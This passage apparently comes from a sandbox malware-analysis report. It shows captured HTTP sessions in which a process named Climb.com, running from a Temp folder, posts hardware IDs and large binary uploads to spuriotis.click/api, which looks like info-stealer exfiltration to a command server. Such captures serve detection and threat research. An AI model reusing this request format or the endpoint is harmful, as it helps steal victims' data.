                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hd7GZEWYQa65F9DuuKEUQNsTnURoqI%2B5p9shrvnvP4bkgJyXkwYMLYbi%2BO%2B%2ByFNGLFnwG8aW6Alr8CN5vITeUb3CRjFFMrpZXRxjMnd6%2FE2obq1bAOsEWhe1lRJqIqK%2FbOg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f902f93dc078cad-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2108&min_rtt=2035&rtt_var=815&sent=11&recv=20&lost=0&retrans=0&sent_bytes=2833&recv_bytes=15965&delivery_rate=1434889&cwnd=246&unsent_bytes=0&cid=f9829817c4c1b21b&ts=841&x=0"
                                                                                                                                                                    2024-12-28 08:30:00 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                    2024-12-28 08:30:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.549800172.67.128.1844435660C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-28 08:30:02 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=FL5CLJC2ZZYV0FN
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 20547
                                                                                                                                                                    Host: spuriotis.click
                                                                                                                                                                    2024-12-28 08:30:02 UTC15331OUTData Raw: 2d 2d 46 4c 35 43 4c 4a 43 32 5a 5a 59 56 30 46 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 46 37 43 34 44 36 33 44 42 43 34 35 32 46 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 46 4c 35 43 4c 4a 43 32 5a 5a 59 56 30 46 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 46 4c 35 43 4c 4a 43 32 5a 5a 59 56 30 46 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 46 4c 35 43 4c 4a 43
                                                                                                                                                                    Data Ascii: --FL5CLJC2ZZYV0FNContent-Disposition: form-data; name="hwid"7F7C4D63DBC452FCD9AC212D15D33917--FL5CLJC2ZZYV0FNContent-Disposition: form-data; name="pid"3--FL5CLJC2ZZYV0FNContent-Disposition: form-data; name="lid"5FwhVM--lll--FL5CLJC
                                                                                                                                                                    2024-12-28 08:30:02 UTC5216OUTData Raw: 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00
                                                                                                                                                                    Data Ascii: h'F3Wun 4F([:7s~X`nO`i
                                                                                                                                                                    2024-12-28 08:30:03 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sat, 28 Dec 2024 08:30:03 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=3jm8e743gi1jp542nchc23u3so; expires=Wed, 23 Apr 2025 02:16:42 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QvbfOiccKtEuUrRiqUoiadr891RG6qDqyLBLpC%2FSBn%2BM7HJM9ZuBX1LtvKsHykpIRu3TAmz8APK4WBewU%2Bg374sAPaE3vwYxicWXdwsBN1EnRPWPYv3JfIdTTyClHXGPr4c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f902fa22eba8ce8-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1843&min_rtt=1792&rtt_var=775&sent=14&recv=27&lost=0&retrans=0&sent_bytes=2833&recv_bytes=21505&delivery_rate=1323662&cwnd=239&unsent_bytes=0&cid=1a1e7143f663af37&ts=999&x=0"
                                                                                                                                                                    2024-12-28 08:30:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                    2024-12-28 08:30:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.549810172.67.128.1844435660C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-28 08:30:05 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=PGRU0P1V1YYI
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 1211
                                                                                                                                                                    Host: spuriotis.click
                                                                                                                                                                    2024-12-28 08:30:05 UTC1211OUTData Raw: 2d 2d 50 47 52 55 30 50 31 56 31 59 59 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 46 37 43 34 44 36 33 44 42 43 34 35 32 46 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 50 47 52 55 30 50 31 56 31 59 59 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 47 52 55 30 50 31 56 31 59 59 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 50 47 52 55 30 50 31 56 31 59 59 49 0d 0a 43 6f
                                                                                                                                                                    Data Ascii: --PGRU0P1V1YYIContent-Disposition: form-data; name="hwid"7F7C4D63DBC452FCD9AC212D15D33917--PGRU0P1V1YYIContent-Disposition: form-data; name="pid"1--PGRU0P1V1YYIContent-Disposition: form-data; name="lid"5FwhVM--lll--PGRU0P1V1YYICo
                                                                                                                                                                    2024-12-28 08:30:05 UTC1122INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sat, 28 Dec 2024 08:30:05 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=hg2uk0te7vaia3lndvbqd0lr4m; expires=Wed, 23 Apr 2025 02:16:44 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=asdUCrxzHUXBR%2B5dwshQhEQD12W8kOIFQy6fHKExNvhNYyDXTmqJczbRZ3h2cNfGTrFOxMmrNaGNLnlEp2mj0eoBEeM9j1R1irPQeIAyfwih0NVaiEC%2FjzBb61aIx00pJHA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f902fb2ee5ede9a-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1516&min_rtt=1495&rtt_var=576&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2121&delivery_rate=1953177&cwnd=209&unsent_bytes=0&cid=57f6d73e3c114d3a&ts=850&x=0"
                                                                                                                                                                    2024-12-28 08:30:05 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                                                                    2024-12-28 08:30:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    7192.168.2.549818172.67.128.1844435660C:\Users\user\AppData\Local\Temp\768400\Climb.com
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-28 08:30:08 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Content-Type: multipart/form-data; boundary=LZT6ZN09IOY
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                    Content-Length: 573710
                                                                                                                                                                    Host: spuriotis.click
                                                                                                                                                                    2024-12-28 08:30:08 UTC15331OUTData Raw: 2d 2d 4c 5a 54 36 5a 4e 30 39 49 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 46 37 43 34 44 36 33 44 42 43 34 35 32 46 43 44 39 41 43 32 31 32 44 31 35 44 33 33 39 31 37 0d 0a 2d 2d 4c 5a 54 36 5a 4e 30 39 49 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 5a 54 36 5a 4e 30 39 49 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 35 46 77 68 56 4d 2d 2d 6c 6c 6c 0d 0a 2d 2d 4c 5a 54 36 5a 4e 30 39 49 4f 59 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                    Data Ascii: --LZT6ZN09IOYContent-Disposition: form-data; name="hwid"7F7C4D63DBC452FCD9AC212D15D33917--LZT6ZN09IOYContent-Disposition: form-data; name="pid"1--LZT6ZN09IOYContent-Disposition: form-data; name="lid"5FwhVM--lll--LZT6ZN09IOYConten
                                                                                                                                                                    2024-12-28 08:30:08 UTC15331OUTData Raw: 0d 03 17 24 23 e2 21 d4 3d 7a ef 89 16 6b 09 26 86 85 4a 43 79 d1 14 94 7e 2d 6e d8 d9 ba 21 85 9c 29 0c 2e 2d 59 c9 84 ee d5 e4 ab b6 0d e0 61 93 a3 fa 6e 09 f5 06 17 b4 a3 4a ac 7b ac 5e 17 da e3 6b 87 64 8d 65 96 df a2 89 49 0c 83 f5 af 7b 76 3d 8b 2d dc 00 e3 60 68 ac ed 34 35 dc 33 8a 47 14 77 eb 40 32 8a 52 fc ee 23 71 7e e0 d2 23 ff 8a ec 00 c9 19 7f f6 4b ed 65 31 f0 41 b1 a1 dc a8 6e 31 f2 17 ee 8c af f9 53 f9 18 04 a4 49 93 13 bd a5 af ef 78 96 bd a5 d9 71 25 cb 87 6f 41 47 22 b6 a3 49 10 65 60 3e 54 c6 3b 9f 2f 39 2a 2d 9e 97 6c e9 0c 5d 4c 92 88 5e 4d 9d b3 9a e5 55 73 ac 5d 6c 2e 17 4a 53 9c d0 e3 e9 ff eb 22 93 97 8f 4f 98 f5 d2 84 29 5d db c5 ae f3 76 c2 81 75 1c eb 1c b9 47 15 5d 92 07 91 7b e9 93 e9 3f ea fa 0b 2a d0 d4 02 40 81 f9 2c bb
                                                                                                                                                                    Data Ascii: $#!=zk&JCy~-n!).-YanJ{^kdeI{v=-`h453Gw@2R#q~#Ke1An1SIxq%oAG"Ie`>T;/9*-l]L^MUs]l.JS"O)]vuG]{?*@,
                                                                                                                                                                    2024-12-28 08:30:08 UTC15331OUTData Raw: b5 c5 8c ba cd d3 29 b4 5a f1 ab dd a1 3c 02 4e f5 fe 56 c9 85 42 04 73 68 0c 6a 1a 88 f0 7f 30 33 28 bb 9d 59 f1 7c 66 f7 58 85 c1 8c c9 86 ca 79 7a 89 80 6f fb b7 a0 28 32 c2 2f f3 3a 2a 4c 03 37 16 52 33 83 29 12 e1 fc c7 cc 44 e7 6e d1 d3 66 06 c9 2d e9 47 37 97 2b b7 29 71 84 5d 38 85 ca ca 04 7f 8f 4a 83 72 63 70 b8 00 65 40 3e 64 49 64 45 cf 50 8d f5 75 51 c2 bf 2f 3f 8c d0 c4 78 96 24 7b 0b 4a dc 37 fe 7b 84 6b 63 95 9c c0 09 f7 55 7d 23 50 66 28 c2 6f 95 5c 27 5e eb bc 25 8c 13 e1 1a 45 10 44 a5 26 0c d2 06 b6 1d 0e d5 b8 78 6c de 4f 59 58 e1 10 46 ea 58 de 73 51 69 5f 9e 1e 62 33 f6 d8 90 be a1 83 68 9b 47 d4 24 e6 96 44 83 87 ca ec de b9 21 cf 3b 75 06 ff a2 4c 8a f0 2e da 17 e5 1a 69 c6 54 5d 9e 35 41 87 c5 e2 50 86 17 fb da 86 4a 86 ce 4f 0b
                                                                                                                                                                    Data Ascii: )Z<NVBshj03(Y|fXyzo(2/:*L7R3)Dnf-G7+)q]8Jrcpe@>dIdEPuQ/?x${J7{kcU}#Pf(o\'^%ED&xlOYXFXsQi_b3hG$D!;uL.iT]5APJO
                                                                                                                                                                    2024-12-28 08:30:08 UTC15331OUTData Raw: 4d a8 45 90 9c ec 9a 65 90 11 d2 08 69 96 ca 4a 09 1e 2a 99 b3 16 32 d5 1b 15 cb 87 ff da e5 2d fc b0 9a be 63 f3 04 ea 24 5e 1d 7d 67 e3 0a be 19 41 83 d7 65 33 92 93 52 da 6f 5e 25 1e 1f a0 01 15 ec 33 8d 32 4d 1b 77 77 e7 5c 1d b6 eb 8d 48 0a 10 ba d8 e7 72 dc 07 42 60 3f af 46 5f dc d6 c1 40 be 15 d2 1a 59 b1 4d c2 cc c5 95 45 e8 b9 bb 62 13 53 21 ab d5 cc cf 78 9f df ca 7b 2b b6 24 e6 e7 36 cd db 09 40 e3 ca db ac ce 3c 2d 43 17 6f 3b a4 44 49 80 16 ed 3b 79 e1 62 02 61 8a 7a 81 53 fb d7 3d 1b 4d fc 67 a8 08 52 45 c9 22 a4 6d 37 f0 1a 70 7d 8a ae 93 cc 8c 15 26 2f 0b 3f d7 62 3e 8b 98 ab 44 90 14 f8 3f 8b f2 01 6f a9 eb 2b d8 fe ef 31 5d aa 99 21 63 15 99 dd 52 16 6e c0 b7 76 e7 89 a3 6e 52 2b de 1b 9d 89 29 6c aa f5 14 9c 18 fb 31 54 5e be 84 9d b6
                                                                                                                                                                    Data Ascii: MEeiJ*2-c$^}gAe3Ro^%32Mww\HrB`?F_@YMEbS!x{+$6@<-Co;DI;ybazS=MgRE"m7p}&/?b>D?o+1]!cRnvnR+)l1T^
                                                                                                                                                                    2024-12-28 08:30:08 UTC15331OUTData Raw: d7 28 e1 ef 91 e3 12 7f 1c 22 50 fe 06 1b cc 72 8c 4e d7 a7 07 55 5d 5a d9 85 a0 18 ad b7 68 78 f4 6b 1e c2 c4 cc 38 96 92 2a 96 95 c4 34 e0 2f 85 14 b2 cc 12 5e bd 60 4c ba 09 62 87 be be 2a e9 b5 79 14 57 ad 1b 30 74 55 2d 0f 1d a6 9a e1 ae 14 2a 0d ae e0 4c 06 fd fc 11 e7 f1 56 cd cf 37 3b dc 64 0b 25 15 f2 e6 94 db 3b d6 3f e5 92 cc 36 3d 40 0b 4a e6 01 50 ab 1b c5 2a 9e a3 56 cc 6f 4c 0a 57 bd b7 18 fc a3 64 3f 50 29 79 cf c6 1f c3 28 dd d2 ee 36 ce a1 ab 5d 7d d1 10 e4 b7 3f 01 1d 2d f4 3f 53 e1 ff bd 64 2a 83 6c 78 34 49 96 14 6d c2 dc 5e 41 70 46 0b 4e dc 5a 7a 42 5a 77 22 de 50 23 2a 4f e1 b6 e6 27 32 3b 26 83 94 09 6f 2a ed ae b8 b2 c6 46 d3 7d f7 f8 41 5d 63 79 e5 3c 33 d0 6c 00 03 97 df d3 96 96 19 e9 ed 58 1f ac c0 c5 07 8b 3c 16 6a 29 97 6e
                                                                                                                                                                    Data Ascii: ("PrNU]Zhxk8*4/^`Lb*yW0tU-*LV7;d%;?6=@JP*VoLWd?P)y(6]}?-?Sd*lx4Im^ApFNZzBZw"P#*O'2;&o*F}A]cy<3lX<j)n
                                                                                                                                                                    2024-12-28 08:30:08 UTC15331OUTData Raw: 15 40 cc c5 be ce e0 a3 76 06 a7 e9 80 0f 26 f5 ab 46 59 3c d8 ce 42 45 d8 30 37 c3 0a b8 9e ba df 5b 72 9e 6a 61 98 89 8c 10 59 8f 0f 5b 14 e7 5f 51 ae 94 ef f9 74 f9 67 d8 cf 27 1a 88 12 a4 4d 03 6e 3c a3 1c 72 db 41 65 66 44 e0 f5 51 f1 12 5d 0b a2 77 61 13 55 dc 62 61 30 be 7a 31 10 36 cb 7d 78 b8 5f f5 e7 44 5f d6 ec 9b 97 23 c2 6e 72 e3 d2 8b d6 c7 1e 8e 3b f2 ae 34 1f 1b 9b 2d c8 4e d6 97 89 0f 39 c0 12 b9 c5 90 fb 21 e9 4d bf 8c 7d 57 87 f8 40 3d 1e 1b 37 66 ac 14 5b 0e cb 73 4b 5c 4e 5c 6e 17 89 c8 a5 ab aa ca 9c 4b 9a 71 6e 10 7d 20 47 74 e5 ca 8c c0 eb 1d 56 07 b2 e7 37 7d 64 1d ff c0 9a 7c 7f d5 5e e6 83 4d 5c 9b ac ba 4a 8c 39 34 26 56 90 56 d3 3c 52 22 2d 26 e0 94 7f f8 8c dc ca 12 d9 64 dc b7 bf f2 28 cf 19 31 f9 3e b3 e3 1d ab 76 20 48 9d
                                                                                                                                                                    Data Ascii: @v&FY<BE07[rjaY[_Qtg'Mn<rAefDQ]waUba0z16}x_D_#nr;4-N9!M}W@=7f[sK\N\nKqn} GtV7}d|^M\J94&VV<R"-&d(1>v H
                                                                                                                                                                    2024-12-28 08:30:08 UTC15331OUTData Raw: c1 a6 c5 5f 5f fe d2 25 17 4a 81 d1 8b a0 4c 02 9b 27 8a cb e3 be 13 ba 35 fb 63 ac 90 9b ef ab 2d 85 e0 24 a3 95 3a 4f b9 7c f5 64 45 7e 6d b6 3c 76 a0 21 78 21 b2 e1 d6 65 91 43 67 0e d4 96 17 b8 97 56 f6 ba 9d b9 85 d2 21 6a 69 3e d1 41 bb f1 24 04 0a ec 87 a1 1b 77 ac cf 3a 44 58 9e d0 5d b6 91 10 35 f8 fd 1b d5 97 fc da 17 2e fa f6 b8 d3 7f 0f 2b 9f 87 2b 62 07 93 45 1e 29 a8 23 8e 56 7c f6 5e d8 d4 37 ef d5 dd d4 a9 9a 16 fa d1 eb 39 36 77 c9 e2 f2 e3 2c 07 e3 9a b3 4f 79 10 5e 3f 5f ce f4 1d eb 95 57 b3 a9 b9 59 81 8a f8 70 6d ed 52 55 50 b2 b5 76 cf cf 91 67 47 f0 61 df 5c 5d ac 67 45 70 57 48 eb b7 ac df 8f 0c 58 56 a8 15 25 77 d1 be fa 7b 95 e6 4a 8b f7 16 a8 5c 61 a2 56 36 5e 2c 48 e7 ed 32 35 ef bf bf 9f 00 b8 ec 2e f2 58 16 a1 b1 bf d3 f2 48
                                                                                                                                                                    Data Ascii: __%JL'5c-$:O|dE~m<v!x!eCgV!ji>A$w:DX]5.++bE)#V|^796w,Oy^?_WYpmRUPvgGa\]gEpWHXV%w{J\aV6^,H25.XH
                                                                                                                                                                    2024-12-28 08:30:08 UTC15331OUTData Raw: 66 f2 f3 97 96 d6 b4 07 08 3a 62 1e dd 1c 14 3e 24 eb 73 f3 13 c2 58 9c c9 72 39 45 37 c7 c9 d6 b7 d4 c2 6c 7a 41 41 f4 be d0 e0 d5 55 96 2a 5d f9 7a 85 bd 62 0c 9a 78 92 24 40 8f 1f 9c 72 9f ee 92 85 56 db 6a bf 8f 32 1a 96 c1 11 9a f3 ea db e2 be 74 2b c5 6f e6 f2 f2 64 3b aa 7d f7 58 4d a8 8b 52 b0 db 77 91 74 bc 80 45 bb 58 e5 39 df 2b c0 ae 46 d7 74 24 c7 ea 7e 1f 4d 83 e2 0e 34 78 69 b9 3b 71 41 64 bb f5 0d 10 0e 62 bd fa 26 28 b3 bb 05 f5 d1 d6 e9 85 c8 47 df 2a 6e f8 46 14 f6 08 b2 e2 f8 86 e5 ff 64 a4 5b dd f6 b2 11 32 00 c5 e1 8b cd 53 77 5c f5 81 e7 11 96 a0 c1 72 28 8f fb cd bf 06 e6 79 35 6e 29 1f c1 f1 33 3f 44 b8 ca 88 69 e6 39 ff 59 2d 9e 71 d3 d2 98 c1 67 9e 71 db 28 13 30 07 28 c4 f2 4e d5 05 97 0e a8 ec b9 09 78 cd 31 91 a2 d4 d4 19 29
                                                                                                                                                                    Data Ascii: f:b>$sXr9E7lzAAU*]zbx$@rVj2t+od;}XMRwtEX9+Ft$~M4xi;qAdb&(G*nFd[2Sw\r(y5n)3?Di9Y-qgq(0(Nx1)
                                                                                                                                                                    2024-12-28 08:30:08 UTC15331OUTData Raw: ff 6b db 2f 15 31 5f 7e 7f 70 15 b1 e8 e4 79 1c 9b bc d4 9d da 89 80 26 c4 5c ca aa 5f e0 77 b7 2a 44 1a 1a 69 67 ca b1 8e a5 29 4b 5f e0 d7 fc 35 fd 61 57 19 12 42 e4 e8 ce 0f 3b fa 7f 57 d0 67 de df c3 59 7a 29 21 0b af 0b 05 60 da 7d ea 27 e3 ca 7f fe d4 35 88 a4 90 e2 27 b8 d9 1c 18 f1 92 7d 4a c6 a3 0a 6a e0 5e 10 cd 53 b1 56 3f 4c c4 6e 04 8b 48 f7 f8 c1 ad e9 c1 1d 84 b3 d5 56 c6 d2 02 66 e4 67 82 da 05 94 21 da 09 54 4f 24 dd 01 95 e6 cf c5 cf a0 fb a2 00 5b 9c fb 5d 46 3a b0 27 fc 78 62 db 80 5c ae b6 e8 5c 4e d1 73 b4 ea be 33 f2 0e 44 63 43 de f8 7a 4e f0 b7 50 01 04 3f 30 60 26 03 3b e7 88 0f ca fa 3f 05 36 c7 1b 67 06 42 7b 26 05 db e3 ca b4 fa a9 e9 12 cd 39 91 55 0e 7f 52 fd b9 e4 63 cd 79 c7 cc e4 04 2f 6c 95 fe 3e b8 79 86 58 04 2e 51 39
                                                                                                                                                                    Data Ascii: k/1_~py&\_w*Dig)K_5aWB;WgYz)!`}'5'}Jj^SV?LnHVfg!TO$[]F:'xb\\Ns3DcCzNP?0`&;?6gB{&9URcy/l>yX.Q9
                                                                                                                                                                    2024-12-28 08:30:08 UTC15331OUTData Raw: b1 60 e4 35 0b a1 f6 a8 25 6c f4 44 79 8a 20 1c 0f 89 82 1f 50 5a d4 c7 be 85 fd 8b 0f 7f 0e 35 fb bf ae 57 f0 86 b2 0e 51 f9 d9 d2 bc 0f 29 da 0d 51 82 2c 4c 91 63 ef 46 17 a1 ce 2c 3d b5 2f e2 93 21 53 55 c4 d8 7f f0 e4 36 6c 7e 62 b5 4b 87 0c b5 4b 34 bf c0 18 4d 85 dd ee e9 54 52 b2 08 b1 75 dd 7e bc db 6f c0 5d 6d fb 11 7a 5e 4a f2 31 b3 86 30 0d e9 cb 3f df bc 0d 38 d0 1b cf cf 0b 18 55 aa 25 d8 d8 d4 45 d0 28 01 9b 37 11 85 1f 2e 94 81 8e e9 41 c8 e9 6c fd 68 6a e1 25 3e 02 8d a0 fc 34 11 b5 65 b3 24 33 14 09 8a 0a b4 b2 2b 0a d4 cf e5 14 04 e0 e7 a9 83 ad a8 ad d3 c5 00 3f f6 01 b7 a1 86 d9 ec a9 15 59 41 43 db 76 18 ee 6f aa af b1 e1 be f1 ff ca cb 30 da f8 e8 d5 c4 cc a8 3e fb d6 3f 75 23 d7 7f 90 67 c3 bc 39 c7 ab 34 e4 b2 bf da a7 7f 64 b7 65
                                                                                                                                                                    Data Ascii: `5%lDy PZ5WQ)Q,LcF,=/!SU6l~bKK4MTRu~o]mz^J10?8U%E(7.Alhj%>4e$3+?YACvo0>?u#g94de
                                                                                                                                                                    2024-12-28 08:30:12 UTC1129INHTTP/1.1 200 OK
                                                                                                                                                                    Date: Sat, 28 Dec 2024 08:30:12 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: close
                                                                                                                                                                    Set-Cookie: PHPSESSID=2n3h3f02pvd9mpaaa2ac1i5rva; expires=Wed, 23 Apr 2025 02:16:50 GMT; Max-Age=9999999; path=/
                                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                                    vary: accept-encoding
                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EOlLH9xUTn4WPD3o%2FK3Hi7NIXSRHtVu3g%2FhiIVlSawgH2takY9AHzYmcuMs7raKi8F4har9VGoX5WgNpdPq8ZD5WiSTqh1XWKIgLSWolZeRzimXXacuAzIKEYwCJDR9yFRk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                    CF-RAY: 8f902fc60e65c470-EWR
                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
